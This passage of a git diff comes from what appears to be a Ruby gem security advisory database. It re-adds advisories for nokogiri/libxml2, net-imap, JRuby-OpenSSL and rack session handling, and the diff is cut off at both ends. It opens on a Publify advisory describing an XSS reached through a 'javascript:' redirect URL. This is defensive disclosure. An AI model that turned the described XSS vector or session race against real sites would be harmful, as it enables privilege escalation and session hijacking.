+    We can create a redirect to a `javascript:alert()` URL. Whilst the
+    redirect itself doesn't work, on the administrative panel, an a tag
+    is created with the payload as the URI. Upon clicking this link,
+    the XSS is triggered.
+
+    An attack could attempt to hide their payload by using HTML, or
+    other encodings, as to not make it obvious to an administrator
+    that this is a malicious link.
+
+    ### Impact
+
+    A publisher may attempt to use this vulnerability to escalate their
+    privileges and become an administrator."
+  cvss_v4: 1.8
+  patched_versions:
+  - ">= 10.0.2"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-39311
+    - https://github.com/publify/publify/security/advisories/GHSA-8fm5-gg2f-f66q
+    - https://github.com/advisories/GHSA-8fm5-gg2f-f66q
+---
diff --git a/advisories/_posts/2025-04-21-GHSA-5w6v-399v-w3cc.md b/advisories/_posts/2025-04-21-GHSA-5w6v-399v-w3cc.md
index 3de1330b..a1cdee48 100644
--- a/advisories/_posts/2025-04-21-GHSA-5w6v-399v-w3cc.md
+++ b/advisories/_posts/2025-04-21-GHSA-5w6v-399v-w3cc.md
@@ -1,68 +1,68 @@
----
-layout: advisory
-title: 'GHSA-5w6v-399v-w3cc (nokogiri): Nokogiri updates packaged libxml2 to v2.13.8
-  to resolve CVE-2025-32414 and CVE-2025-32415'
-comments: false
-categories:
-- nokogiri
-advisory:
-  gem: nokogiri
-  ghsa: 5w6v-399v-w3cc
-  url: https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-5w6v-399v-w3cc
-  title: Nokogiri updates packaged libxml2 to v2.13.8 to resolve CVE-2025-32414 and
-    CVE-2025-32415
-  date: 2025-04-21
-  description: |
-    ## Summary
-
-    Nokogiri v1.18.8 upgrades its dependency libxml2 to
-    [v2.13.8](https://gitlab.gnome.org/GNOME/libxml2/-/releases/v2.13.8).
-
-    libxml2 v2.13.8 addresses:
-
-    - CVE-2025-32414
-      - described at https://gitlab.gnome.org/GNOME/libxml2/-/issues/889
-    - CVE-2025-32415
-      - described at https://gitlab.gnome.org/GNOME/libxml2/-/issues/890
-
-    ## Impact
-
-    ### CVE-2025-32414: No impact
-
-    In libxml2 before 2.13.8 and 2.14.x before 2.14.2, out-of-bounds
-    memory access can occur in the Python API (Python bindings) because
-    of an incorrect return value. This occurs in xmlPythonFileRead and
-    xmlPythonFileReadRaw because of a difference between bytes and characters.
-
-    **There is no impact** from this CVE for Nokogiri users.
-
-    ### CVE-2025-32415: Low impact
-
-    In libxml2 before 2.13.8 and 2.14.x before 2.14.2,
-    xmlSchemaIDCFillNodeTables in xmlschemas.c has a heap-based buffer
-    under-read. To exploit this, a crafted XML document must be validated
-    against an XML schema with certain identity constraints, or a
-    crafted XML schema must be used.
-
-    In the upstream issue, further context is provided by the maintainer:
-
-    > The bug affects validation against untrusted XML Schemas (.xsd)
-    > and validation of untrusted documents against trusted Schemas if
-    > they make use of xsd:keyref in combination with recursively
-    > defined types that have additional identity constraints.
-
-    MITRE has published a severity score of 2.9 LOW
-    (CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L) for this CVE.
-  patched_versions:
-  - ">= 1.18.8"
-  related:
-    cve:
-    - CVE-2025-32414
-    - CVE-2025-32415
-    url:
-    - https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-5w6v-399v-w3cc
-    - https://gitlab.gnome.org/GNOME/libxml2/-/releases/v2.13.8
-    - https://gitlab.gnome.org/GNOME/libxml2/-/issues/889
-    - https://gitlab.gnome.org/GNOME/libxml2/-/issues/890
-    - https://github.com/advisories/GHSA-5w6v-399v-w3cc
----
+---
+layout: advisory
+title: 'GHSA-5w6v-399v-w3cc (nokogiri): Nokogiri updates packaged libxml2 to v2.13.8
+  to resolve CVE-2025-32414 and CVE-2025-32415'
+comments: false
+categories:
+- nokogiri
+advisory:
+  gem: nokogiri
+  ghsa: 5w6v-399v-w3cc
+  url: https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-5w6v-399v-w3cc
+  title: Nokogiri updates packaged libxml2 to v2.13.8 to resolve CVE-2025-32414 and
+    CVE-2025-32415
+  date: 2025-04-21
+  description: |
+    ## Summary
+
+    Nokogiri v1.18.8 upgrades its dependency libxml2 to
+    [v2.13.8](https://gitlab.gnome.org/GNOME/libxml2/-/releases/v2.13.8).
+
+    libxml2 v2.13.8 addresses:
+
+    - CVE-2025-32414
+      - described at https://gitlab.gnome.org/GNOME/libxml2/-/issues/889
+    - CVE-2025-32415
+      - described at https://gitlab.gnome.org/GNOME/libxml2/-/issues/890
+
+    ## Impact
+
+    ### CVE-2025-32414: No impact
+
+    In libxml2 before 2.13.8 and 2.14.x before 2.14.2, out-of-bounds
+    memory access can occur in the Python API (Python bindings) because
+    of an incorrect return value. This occurs in xmlPythonFileRead and
+    xmlPythonFileReadRaw because of a difference between bytes and characters.
+
+    **There is no impact** from this CVE for Nokogiri users.
+
+    ### CVE-2025-32415: Low impact
+
+    In libxml2 before 2.13.8 and 2.14.x before 2.14.2,
+    xmlSchemaIDCFillNodeTables in xmlschemas.c has a heap-based buffer
+    under-read. To exploit this, a crafted XML document must be validated
+    against an XML schema with certain identity constraints, or a
+    crafted XML schema must be used.
+
+    In the upstream issue, further context is provided by the maintainer:
+
+    > The bug affects validation against untrusted XML Schemas (.xsd)
+    > and validation of untrusted documents against trusted Schemas if
+    > they make use of xsd:keyref in combination with recursively
+    > defined types that have additional identity constraints.
+
+    MITRE has published a severity score of 2.9 LOW
+    (CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L) for this CVE.
+  patched_versions:
+  - ">= 1.18.8"
+  related:
+    cve:
+    - CVE-2025-32414
+    - CVE-2025-32415
+    url:
+    - https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-5w6v-399v-w3cc
+    - https://gitlab.gnome.org/GNOME/libxml2/-/releases/v2.13.8
+    - https://gitlab.gnome.org/GNOME/libxml2/-/issues/889
+    - https://gitlab.gnome.org/GNOME/libxml2/-/issues/890
+    - https://github.com/advisories/GHSA-5w6v-399v-w3cc
+---
diff --git a/advisories/_posts/2025-04-28-CVE-2025-43857.md b/advisories/_posts/2025-04-28-CVE-2025-43857.md
index 0e447d7f..e0b48018 100644
--- a/advisories/_posts/2025-04-28-CVE-2025-43857.md
+++ b/advisories/_posts/2025-04-28-CVE-2025-43857.md
@@ -1,132 +1,132 @@
----
-layout: advisory
-title: 'CVE-2025-43857 (net-imap): net-imap rubygem vulnerable to possible DoS by
-  memory exhaustion'
-comments: false
-categories:
-- net-imap
-advisory:
-  gem: net-imap
-  cve: 2025-43857
-  ghsa: j3g3-5qv5-52mj
-  url: https://github.com/ruby/net-imap/security/advisories/GHSA-j3g3-5qv5-52mj
-  title: net-imap rubygem vulnerable to possible DoS by memory exhaustion
-  date: 2025-04-28
-  description: |
-    ### Summary
-
-    There is a possibility for denial of service by memory exhaustion
-    when `net-imap` reads server responses.  At any time while the client
-    is connected, a malicious server can send can send a "literal" byte
-    count, which is automatically read by the client's receiver thread.
-    The response reader immediately allocates memory for the number of
-    bytes indicated by the server response.
-
-    This should not be an issue when securely connecting to trusted IMAP
-    servers that are well-behaved.  It can affect insecure connections
-    and buggy, untrusted, or compromised servers (for example, connecting
-    to a user supplied hostname).
-
-    ### Details
-
-    The IMAP protocol allows "literal" strings to be sent in responses,
-    prefixed with their size in curly braces (e.g. `{1234567890}`).
-    When `Net::IMAP` receives a response containing a literal string,
-    it calls `IO#read` with that size.  When called with a size,
-    `IO#read` immediately allocates memory to buffer the entire string
-    before processing continues.  The server does not need to send any
-    more data.  There is no limit on the size of literals that will be
-    accepted.
-
-    ### Fix
-    #### Upgrade
-    Users should upgrade to `net-imap` 0.5.7 or later.  A configurable
-    `max_response_size` limit has been added to `Net::IMAP`'s response
-    reader.  The `max_response_size` limit has also been backported to
-    `net-imap` 0.2.5, 0.3.9, and 0.4.20.
-
-    To set a global value for `max_response_size`, users must upgrade
-    to `net-imap` ~> 0.4.20, or > 0.5.7.
-
-    #### Configuration
-
-    To avoid backward compatibility issues for secure connections to
-    trusted well-behaved servers, the default `max_response_size` for
-    `net-imap` 0.5.7 is _very high_ (512MiB), and the default
-    `max_response_size` for `net-imap` ~> 0.4.20, ~> 0.3.9, and 0.2.5
-    is `nil` (unlimited).
-
-    When connecting to untrusted servers or using insecure connections,
-    a much lower `max_response_size` should be used.
-    ```ruby
-    # Set the global max_response_size (only ~> v0.4.20, > 0.5.7)
-    Net::IMAP.config.max_response_size = 256 << 10 # 256 KiB
-
-    # Set when creating the connection
-    imap = Net::IMAP.new(hostname, ssl: true,
-                         max_response_size: 16 << 10) # 16 KiB
-
-    # Set after creating the connection
-    imap.max_response_size = 256 << 20 # 256 KiB
-    # flush currently waiting read, to ensure the new setting is loaded
-    imap.noop
-    ```
-
-    _**Please Note:**_ `max_response_size` only limits the size _per
-    response_.  It does not prevent a flood of individual responses
-    and it does not limit how many unhandled responses may be stored
-    on the responses hash.  Users are responsible for adding response
-    handlers to prune excessive unhandled responses.
-
-    #### Compatibility with lower `max_response_size`
-
-    A lower `max_response_size` may cause a few commands which
-    legitimately return very large responses to raise an exception
-    and close the connection.  The `max_response_size` could be
-    temporarily set to a higher value, but paginated or limited
-    versions of commands should be used whenever possible.  For
-    example, to fetch message bodies:
-
-    ```ruby
-    imap.max_response_size = 256 << 20 # 256 KiB
-    imap.noop # flush currently waiting read
-
-    # fetch a message in 252KiB chunks
-    size = imap.uid_fetch(uid, "RFC822.SIZE").first.rfc822_size
-    limit = 252 << 10
-    message = ((0..size)limit).each_with_object("") {|offset, str|
-      str << imap.uid_fetch(uid,
-      "BODY.PEEK[]<#{offset}.#{limit}>").first.message(offset:)
-    }
-
-    imap.max_response_size = 16 << 20 # 16 KiB
-    imap.noop # flush currently waiting read
-    ```
-
-    ### References
-
-    * PR to introduce max_response_size: https://github.com/ruby/net-imap/pull/442
-      * Specific commit: [0ae8576c1 - lib/net/imap/response_reader.rb](https://github.com/ruby/net-imap/pull/444/commits/0ae8576c1a90bcd9573f81bdad4b4b824642d105#diff-53721cb4d9c3fb86b95cc8476ca2df90968ad8c481645220c607034399151462)
-    * Backport to 0.4: https://github.com/ruby/net-imap/pull/445
-    * Backport to 0.3: https://github.com/ruby/net-imap/pull/446
-    * Backport to 0.2: https://github.com/ruby/net-imap/pull/447
-  cvss_v4: 6.0
-  patched_versions:
-  - "~> 0.2.5"
-  - "~> 0.3.9"
-  - "~> 0.4.20"
-  - ">= 0.5.7"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2025-43857
-    - https://www.ruby-lang.org/en/news/2025/04/28/dos-net-imap-cve-2025-43857
-    - https://github.com/ruby/net-imap/security/advisories/GHSA-j3g3-5qv5-52mj
-    - https://github.com/ruby/net-imap/pull/442
-    - https://github.com/ruby/net-imap/pull/444/commits/0ae8576c1a90bcd9573f81bdad4b4b824642d105#diff-53721cb4d9c3fb86b95cc8476ca2df90968ad8c481645220c607034399151462
-    - https://github.com/ruby/net-imap/pull/445
-    - https://github.com/ruby/net-imap/pull/446
-    - https://github.com/ruby/net-imap/pull/447
-    - https://nvd.nist.gov/vuln/detail/CVE-2025-43857
-    - https://github.com/advisories/GHSA-j3g3-5qv5-52mj
-    - https://hackerone.com/reports/3108869
----
+---
+layout: advisory
+title: 'CVE-2025-43857 (net-imap): net-imap rubygem vulnerable to possible DoS by
+  memory exhaustion'
+comments: false
+categories:
+- net-imap
+advisory:
+  gem: net-imap
+  cve: 2025-43857
+  ghsa: j3g3-5qv5-52mj
+  url: https://github.com/ruby/net-imap/security/advisories/GHSA-j3g3-5qv5-52mj
+  title: net-imap rubygem vulnerable to possible DoS by memory exhaustion
+  date: 2025-04-28
+  description: |
+    ### Summary
+
+    There is a possibility for denial of service by memory exhaustion
+    when `net-imap` reads server responses.  At any time while the client
+    is connected, a malicious server can send can send a "literal" byte
+    count, which is automatically read by the client's receiver thread.
+    The response reader immediately allocates memory for the number of
+    bytes indicated by the server response.
+
+    This should not be an issue when securely connecting to trusted IMAP
+    servers that are well-behaved.  It can affect insecure connections
+    and buggy, untrusted, or compromised servers (for example, connecting
+    to a user supplied hostname).
+
+    ### Details
+
+    The IMAP protocol allows "literal" strings to be sent in responses,
+    prefixed with their size in curly braces (e.g. `{1234567890}`).
+    When `Net::IMAP` receives a response containing a literal string,
+    it calls `IO#read` with that size.  When called with a size,
+    `IO#read` immediately allocates memory to buffer the entire string
+    before processing continues.  The server does not need to send any
+    more data.  There is no limit on the size of literals that will be
+    accepted.
+
+    ### Fix
+    #### Upgrade
+    Users should upgrade to `net-imap` 0.5.7 or later.  A configurable
+    `max_response_size` limit has been added to `Net::IMAP`'s response
+    reader.  The `max_response_size` limit has also been backported to
+    `net-imap` 0.2.5, 0.3.9, and 0.4.20.
+
+    To set a global value for `max_response_size`, users must upgrade
+    to `net-imap` ~> 0.4.20, or > 0.5.7.
+
+    #### Configuration
+
+    To avoid backward compatibility issues for secure connections to
+    trusted well-behaved servers, the default `max_response_size` for
+    `net-imap` 0.5.7 is _very high_ (512MiB), and the default
+    `max_response_size` for `net-imap` ~> 0.4.20, ~> 0.3.9, and 0.2.5
+    is `nil` (unlimited).
+
+    When connecting to untrusted servers or using insecure connections,
+    a much lower `max_response_size` should be used.
+    ```ruby
+    # Set the global max_response_size (only ~> v0.4.20, > 0.5.7)
+    Net::IMAP.config.max_response_size = 256 << 10 # 256 KiB
+
+    # Set when creating the connection
+    imap = Net::IMAP.new(hostname, ssl: true,
+                         max_response_size: 16 << 10) # 16 KiB
+
+    # Set after creating the connection
+    imap.max_response_size = 256 << 20 # 256 KiB
+    # flush currently waiting read, to ensure the new setting is loaded
+    imap.noop
+    ```
+
+    _**Please Note:**_ `max_response_size` only limits the size _per
+    response_.  It does not prevent a flood of individual responses
+    and it does not limit how many unhandled responses may be stored
+    on the responses hash.  Users are responsible for adding response
+    handlers to prune excessive unhandled responses.
+
+    #### Compatibility with lower `max_response_size`
+
+    A lower `max_response_size` may cause a few commands which
+    legitimately return very large responses to raise an exception
+    and close the connection.  The `max_response_size` could be
+    temporarily set to a higher value, but paginated or limited
+    versions of commands should be used whenever possible.  For
+    example, to fetch message bodies:
+
+    ```ruby
+    imap.max_response_size = 256 << 20 # 256 KiB
+    imap.noop # flush currently waiting read
+
+    # fetch a message in 252KiB chunks
+    size = imap.uid_fetch(uid, "RFC822.SIZE").first.rfc822_size
+    limit = 252 << 10
+    message = ((0..size)limit).each_with_object("") {|offset, str|
+      str << imap.uid_fetch(uid,
+      "BODY.PEEK[]<#{offset}.#{limit}>").first.message(offset:)
+    }
+
+    imap.max_response_size = 16 << 20 # 16 KiB
+    imap.noop # flush currently waiting read
+    ```
+
+    ### References
+
+    * PR to introduce max_response_size: https://github.com/ruby/net-imap/pull/442
+      * Specific commit: [0ae8576c1 - lib/net/imap/response_reader.rb](https://github.com/ruby/net-imap/pull/444/commits/0ae8576c1a90bcd9573f81bdad4b4b824642d105#diff-53721cb4d9c3fb86b95cc8476ca2df90968ad8c481645220c607034399151462)
+    * Backport to 0.4: https://github.com/ruby/net-imap/pull/445
+    * Backport to 0.3: https://github.com/ruby/net-imap/pull/446
+    * Backport to 0.2: https://github.com/ruby/net-imap/pull/447
+  cvss_v4: 6.0
+  patched_versions:
+  - "~> 0.2.5"
+  - "~> 0.3.9"
+  - "~> 0.4.20"
+  - ">= 0.5.7"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-43857
+    - https://www.ruby-lang.org/en/news/2025/04/28/dos-net-imap-cve-2025-43857
+    - https://github.com/ruby/net-imap/security/advisories/GHSA-j3g3-5qv5-52mj
+    - https://github.com/ruby/net-imap/pull/442
+    - https://github.com/ruby/net-imap/pull/444/commits/0ae8576c1a90bcd9573f81bdad4b4b824642d105#diff-53721cb4d9c3fb86b95cc8476ca2df90968ad8c481645220c607034399151462
+    - https://github.com/ruby/net-imap/pull/445
+    - https://github.com/ruby/net-imap/pull/446
+    - https://github.com/ruby/net-imap/pull/447
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-43857
+    - https://github.com/advisories/GHSA-j3g3-5qv5-52mj
+    - https://hackerone.com/reports/3108869
+---
diff --git a/advisories/_posts/2025-05-07-CVE-2025-46551.md b/advisories/_posts/2025-05-07-CVE-2025-46551.md
index 208b6d56..40a9a81d 100644
--- a/advisories/_posts/2025-05-07-CVE-2025-46551.md
+++ b/advisories/_posts/2025-05-07-CVE-2025-46551.md
@@ -1,52 +1,52 @@
----
-layout: advisory
-title: 'CVE-2025-46551 (jruby-openssl): JRuby-OpenSSL has hostname verification disabled
-  by default'
-comments: false
-categories:
-- jruby-openssl
-- jruby
-advisory:
-  gem: jruby-openssl
-  platform: jruby
-  cve: 2025-46551
-  ghsa: 72qj-48g4-5xgx
-  url: https://github.com/advisories/GHSA-72qj-48g4-5xgx
-  title: JRuby-OpenSSL has hostname verification disabled by default
-  date: 2025-05-07
-  description: |
-    JRuby-OpenSSL is an add-on gem for JRuby that emulates the Ruby
-    OpenSSL native library.
-
-    Starting in JRuby-OpenSSL version 0.12.1 and prior to version 0.15.4
-    (corresponding to JRuby versions starting in 9.3.4.0 prior to 9.4.12.1
-    and 10.0.0.0 prior to 10.0.0.1), when verifying SSL certificates,
-    JRuby-OpenSSL does not verify that the hostname presented in the
-    certificate matches the one the user tries to connect to.
-    This means a man-in-the-middle could just present any valid cert for
-    a completely different domain they own, and JRuby would accept the cert.
-    Anybody using JRuby to make requests of external APIs, or scraping
-    the web, that depends on https to connect securely.
-    JRuby-OpenSSL version 0.15.4 contains a fix for the issue. This fix
-    is included in JRuby versions 10.0.0.1 and 9.4.12.1.
-  cvss_v3: 3.7
-  cvss_v4: 5.7
-  unaffected_versions:
-  - "<= 0.12.1"
-  patched_versions:
-  - ">= 0.15.4"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2025-46551
-    - https://www.cve.org/CVERecord?id=CVE-2025-46551
-    - https://www.jruby.org/2025/05/07/jruby-9-4-12-1
-    - https://www.jruby.org/2025/05/07/jruby-10-0-0-1
-    - https://bsky.app/profile/jrubyproject.bsky.social/post/3lolurlze3p2s
-    - https://github.com/advisories/GHSA-72qj-48g4-5xgx
-  notes: |
-    1. Reference: https://bsky.app/profile/jrubyproject.bsky.social/post/3lolurlze3p2s
-       -- "Security advisory: We have released jruby-openssl gem 0.15.4,
-          jruby 10.0.0.1, and jruby 9.4.12.1 to address CVE-2025-46551,
-          disabled hostname verification by default.
-          We recommend that all users upgrade!"
----
+---
+layout: advisory
+title: 'CVE-2025-46551 (jruby-openssl): JRuby-OpenSSL has hostname verification disabled
+  by default'
+comments: false
+categories:
+- jruby-openssl
+- jruby
+advisory:
+  gem: jruby-openssl
+  platform: jruby
+  cve: 2025-46551
+  ghsa: 72qj-48g4-5xgx
+  url: https://github.com/advisories/GHSA-72qj-48g4-5xgx
+  title: JRuby-OpenSSL has hostname verification disabled by default
+  date: 2025-05-07
+  description: |
+    JRuby-OpenSSL is an add-on gem for JRuby that emulates the Ruby
+    OpenSSL native library.
+
+    Starting in JRuby-OpenSSL version 0.12.1 and prior to version 0.15.4
+    (corresponding to JRuby versions starting in 9.3.4.0 prior to 9.4.12.1
+    and 10.0.0.0 prior to 10.0.0.1), when verifying SSL certificates,
+    JRuby-OpenSSL does not verify that the hostname presented in the
+    certificate matches the one the user tries to connect to.
+    This means a man-in-the-middle could just present any valid cert for
+    a completely different domain they own, and JRuby would accept the cert.
+    Anybody using JRuby to make requests of external APIs, or scraping
+    the web, that depends on https to connect securely.
+    JRuby-OpenSSL version 0.15.4 contains a fix for the issue. This fix
+    is included in JRuby versions 10.0.0.1 and 9.4.12.1.
+  cvss_v3: 3.7
+  cvss_v4: 5.7
+  unaffected_versions:
+  - "<= 0.12.1"
+  patched_versions:
+  - ">= 0.15.4"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-46551
+    - https://www.cve.org/CVERecord?id=CVE-2025-46551
+    - https://www.jruby.org/2025/05/07/jruby-9-4-12-1
+    - https://www.jruby.org/2025/05/07/jruby-10-0-0-1
+    - https://bsky.app/profile/jrubyproject.bsky.social/post/3lolurlze3p2s
+    - https://github.com/advisories/GHSA-72qj-48g4-5xgx
+  notes: |
+    1. Reference: https://bsky.app/profile/jrubyproject.bsky.social/post/3lolurlze3p2s
+       -- "Security advisory: We have released jruby-openssl gem 0.15.4,
+          jruby 10.0.0.1, and jruby 9.4.12.1 to address CVE-2025-46551,
+          disabled hostname verification by default.
+          We recommend that all users upgrade!"
+---
diff --git a/advisories/_posts/2025-05-08-CVE-2025-32441.md b/advisories/_posts/2025-05-08-CVE-2025-32441.md
index 0758c0a6..88d49a68 100644
--- a/advisories/_posts/2025-05-08-CVE-2025-32441.md
+++ b/advisories/_posts/2025-05-08-CVE-2025-32441.md
@@ -1,64 +1,64 @@
----
-layout: advisory
-title: 'CVE-2025-32441 (rack): Rack session gets restored after deletion'
-comments: false
-categories:
-- rack
-advisory:
-  gem: rack
-  cve: 2025-32441
-  ghsa: vpfw-47h7-xj4g
-  url: https://github.com/rack/rack-session/security/advisories/GHSA-9j94-67jr-4cqj
-  title: Rack session gets restored after deletion
-  date: 2025-05-08
-  description: |
-    ### Summary
-
-    When using the `Rack::Session::Pool` middleware, simultaneous rack
-    requests can restore a deleted rack session, which allows the
-    unauthenticated user to occupy that session.
-
-    ### Details
-
-    [Rack session middleware](https://github.com/rack/rack/blob/v2.2.13/lib/rack/session/abstract/id.rb#L263-L270)
-    prepares the session at the beginning of request, then saves is back
-    to the store with possible changes applied by host rack application.
-    This way the session becomes to be a subject of race conditions in
-    general sense over concurrent rack requests.
-
-    ### Impact
-
-    When using the `Rack::Session::Pool` middleware, and provided the
-    attacker can acquire a session cookie (already a major issue), the
-    session may be restored if the attacker can trigger a long running
-    request (within that same session) adjacent to the user logging out,
-    in order to retain illicit access even after a user has attempted to logout.
-
-    ## Mitigation
-
-    - Update to the latest version of `rack`, or
-    - Ensure your application invalidates sessions atomically by marking
-      them as logged out e.g., using a `logged_out` flag, instead of
-      deleting them, and check this flag on every request to prevent reuse, or
-    - Implement a custom session store that tracks session invalidation
-      timestamps and refuses to accept session data if the session was
-      invalidated after the request began.
-
-    ### Related
-
-    As this code was moved to `rack-session` in Rack 3+, see
-    <https://github.com/rack/rack-session/security/advisories/GHSA-9j94-67jr-4cqj>
-    for the equivalent advisory in `rack-session` (affecting Rack 3+ only).
-  cvss_v3: 4.2
-  patched_versions:
-  - ">= 2.2.14"
-  related:
-    ghsa:
-    - https://github.com/rack/rack-session/security/advisories/GHSA-9j94-67jr-4cqj
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2025-32441
-    - https://github.com/rack/rack/security/advisories/GHSA-vpfw-47h7-xj4g
-    - https://github.com/rack/rack/commit/c48e52f7c57e99e1e1bf54c8760d4f082cd1c89d
-    - https://github.com/rack/rack/blob/v2.2.13/lib/rack/session/abstract/id.rb#L263-L270
-    - https://github.com/advisories/GHSA-vpfw-47h7-xj4g
----
+---
+layout: advisory
+title: 'CVE-2025-32441 (rack): Rack session gets restored after deletion'
+comments: false
+categories:
+- rack
+advisory:
+  gem: rack
+  cve: 2025-32441
+  ghsa: vpfw-47h7-xj4g
+  url: https://github.com/rack/rack-session/security/advisories/GHSA-9j94-67jr-4cqj
+  title: Rack session gets restored after deletion
+  date: 2025-05-08
+  description: |
+    ### Summary
+
+    When using the `Rack::Session::Pool` middleware, simultaneous rack
+    requests can restore a deleted rack session, which allows the
+    unauthenticated user to occupy that session.
+
+    ### Details
+
+    [Rack session middleware](https://github.com/rack/rack/blob/v2.2.13/lib/rack/session/abstract/id.rb#L263-L270)
+    prepares the session at the beginning of request, then saves is back
+    to the store with possible changes applied by host rack application.
+    This way the session becomes to be a subject of race conditions in
+    general sense over concurrent rack requests.
+
+    ### Impact
+
+    When using the `Rack::Session::Pool` middleware, and provided the
+    attacker can acquire a session cookie (already a major issue), the
+    session may be restored if the attacker can trigger a long running
+    request (within that same session) adjacent to the user logging out,
+    in order to retain illicit access even after a user has attempted to logout.
+
+    ## Mitigation
+
+    - Update to the latest version of `rack`, or
+    - Ensure your application invalidates sessions atomically by marking
+      them as logged out e.g., using a `logged_out` flag, instead of
+      deleting them, and check this flag on every request to prevent reuse, or
+    - Implement a custom session store that tracks session invalidation
+      timestamps and refuses to accept session data if the session was
+      invalidated after the request began.
+
+    ### Related
+
+    As this code was moved to `rack-session` in Rack 3+, see
+    <https://github.com/rack/rack-session/security/advisories/GHSA-9j94-67jr-4cqj>
+    for the equivalent advisory in `rack-session` (affecting Rack 3+ only).
+  cvss_v3: 4.2
+  patched_versions:
+  - ">= 2.2.14"
+  related:
+    ghsa:
+    - https://github.com/rack/rack-session/security/advisories/GHSA-9j94-67jr-4cqj
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-32441
+    - https://github.com/rack/rack/security/advisories/GHSA-vpfw-47h7-xj4g
+    - https://github.com/rack/rack/commit/c48e52f7c57e99e1e1bf54c8760d4f082cd1c89d
+    - https://github.com/rack/rack/blob/v2.2.13/lib/rack/session/abstract/id.rb#L263-L270
+    - https://github.com/advisories/GHSA-vpfw-47h7-xj4g
+---
diff --git a/advisories/_posts/2025-05-08-CVE-2025-46336.md b/advisories/_posts/2025-05-08-CVE-2025-46336.md
index be6f6325..74a81717 100644
--- a/advisories/_posts/2025-05-08-CVE-2025-46336.md
+++ b/advisories/_posts/2025-05-08-CVE-2025-46336.md
@@ -1,65 +1,65 @@
----
-layout: advisory
-title: 'CVE-2025-46336 (rack-session): Rack session gets restored after deletion'
-comments: false
-categories:
-- rack-session
-advisory:
-  gem: rack-session
-  cve: 2025-46336
-  ghsa: 9j94-67jr-4cqj
-  url: https://github.com/rack/rack-session/security/advisories/GHSA-9j94-67jr-4cqj
-  title: Rack session gets restored after deletion
-  date: 2025-05-08
-  description: |
-    ## Summary
-
-    When using the `Rack::Session::Pool` middleware, simultaneous rack
-    requests can restore a deleted rack session, which allows the
-    unauthenticated user to occupy that session.
-
-    ## Details
-
-    [Rack session middleware](https://github.com/rack/rack-session/blob/v2.1.0/lib/rack/session/abstract/id.rb#L271-L278)
-    prepares the session at the beginning of request, then saves is back
-    to the store with possible changes applied by host rack application.
-    This way the session becomes to be a subject of race conditions in
-    general sense over concurrent rack requests.
-
-    ## Impact
-
-    When using the `Rack::Session::Pool` middleware, and provided the
-    attacker can acquire a session cookie (already a major issue), the
-    session may be restored if the attacker can trigger a long running
-    request (within that same session) adjacent to the user logging out,
-    in order to retain illicit access even after a user has attempted to logout.
-
-    ## Mitigation
-
-    - Update to the latest version of `rack-session`, or
-    - Ensure your application invalidates sessions atomically by marking
-      them as logged out e.g., using a `logged_out` flag, instead of
-      deleting them, and check this flag on every request to prevent reuse, or
-    - Implement a custom session store that tracks session invalidation
-      timestamps and refuses to accept session data if the session was
-      invalidated after the request began.
-
-    ## Related
-
-    This code was previously part of `rack` in Rack < 3, see
-    <https://github.com/rack/rack/security/advisories/GHSA-vpfw-47h7-xj4g>
-    for the equivalent advisory in `rack` (affecting Rack < 3 only).
-  cvss_v3: 4.2
-  unaffected_versions:
-  - "< 2.0.0"
-  patched_versions:
-  - ">= 2.1.1"
-  related:
-    ghsa:
-    - https://github.com/rack/rack/security/advisories/GHSA-vpfw-47h7-xj4g
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2025-46336
-    - https://github.com/rack/rack-session/commit/c28c4a8c1861d814e09f2ae48264ac4c40be2d3b
-    - https://github.com/rack/rack-session/security/advisories/GHSA-9j94-67jr-4cqj
-    - https://github.com/advisories/GHSA-9j94-67jr-4cqj
----
+---
+layout: advisory
+title: 'CVE-2025-46336 (rack-session): Rack session gets restored after deletion'
+comments: false
+categories:
+- rack-session
+advisory:
+  gem: rack-session
+  cve: 2025-46336
+  ghsa: 9j94-67jr-4cqj
+  url: https://github.com/rack/rack-session/security/advisories/GHSA-9j94-67jr-4cqj
+  title: Rack session gets restored after deletion
+  date: 2025-05-08
+  description: |
+    ## Summary
+
+    When using the `Rack::Session::Pool` middleware, simultaneous rack
+    requests can restore a deleted rack session, which allows the
+    unauthenticated user to occupy that session.
+
+    ## Details
+
+    [Rack session middleware](https://github.com/rack/rack-session/blob/v2.1.0/lib/rack/session/abstract/id.rb#L271-L278)
+    prepares the session at the beginning of request, then saves is back
+    to the store with possible changes applied by host rack application.
+    This way the session becomes to be a subject of race conditions in
+    general sense over concurrent rack requests.
+
+    ## Impact
+
+    When using the `Rack::Session::Pool` middleware, and provided the
+    attacker can acquire a session cookie (already a major issue), the
+    session may be restored if the attacker can trigger a long running
+    request (within that same session) adjacent to the user logging out,
+    in order to retain illicit access even after a user has attempted to logout.
+
+    ## Mitigation
+
+    - Update to the latest version of `rack-session`, or
+    - Ensure your application invalidates sessions atomically by marking
+      them as logged out e.g., using a `logged_out` flag, instead of
+      deleting them, and check this flag on every request to prevent reuse, or
+    - Implement a custom session store that tracks session invalidation
+      timestamps and refuses to accept session data if the session was
+      invalidated after the request began.
+
+    ## Related
+
+    This code was previously part of `rack` in Rack < 3, see
+    <https://github.com/rack/rack/security/advisories/GHSA-vpfw-47h7-xj4g>
+    for the equivalent advisory in `rack` (affecting Rack < 3 only).
+  cvss_v3: 4.2
+  unaffected_versions:
+  - "< 2.0.0"
+  patched_versions:
+  - ">= 2.1.1"
+  related:
+    ghsa:
+    - https://github.com/rack/rack/security/advisories/GHSA-vpfw-47h7-xj4g
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-46336
+    - https://github.com/rack/rack-session/commit/c28c4a8c1861d814e09f2ae48264ac4c40be2d3b
+    - https://github.com/rack/rack-session/security/advisories/GHSA-9j94-67jr-4cqj
